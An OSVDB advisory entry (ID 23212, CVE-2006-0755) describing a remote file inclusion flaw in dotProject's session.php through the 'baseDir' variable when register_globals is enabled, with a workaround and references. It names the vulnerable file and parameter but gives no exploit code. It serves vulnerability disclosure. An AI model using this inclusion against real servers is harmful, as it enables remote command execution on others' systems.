dotProject /includes/session.php baseDir Variable Remote File Inclusion

2006-02-14T07:02:38
ID OSVDB:23212
Type osvdb
Reporter Robin Verton(r.verton@gmail.com)
Modified 2006-02-14T07:02:38

Description

Vulnerability Description

dotProject contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to /includes/session.php not properly sanitizing user input supplied to the 'baseDir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: turn the register_globals PHP option to 'off'.

Short Description

dotProject contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to /includes/session.php not properly sanitizing user input supplied to the 'baseDir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

References:

Vendor URL: http://www.dotproject.net/ Secunia Advisory ID:18879 Related OSVDB ID: 23210 Related OSVDB ID: 23215 Related OSVDB ID: 23217 Related OSVDB ID: 23214 Related OSVDB ID: 23218 Related OSVDB ID: 23206 Related OSVDB ID: 23211 Related OSVDB ID: 23213 Related OSVDB ID: 23216 Related OSVDB ID: 23219 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-02/0241.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-02/0204.html FrSIRT Advisory: ADV-2006-0604 CVE-2006-0755 Bugtraq ID: 16648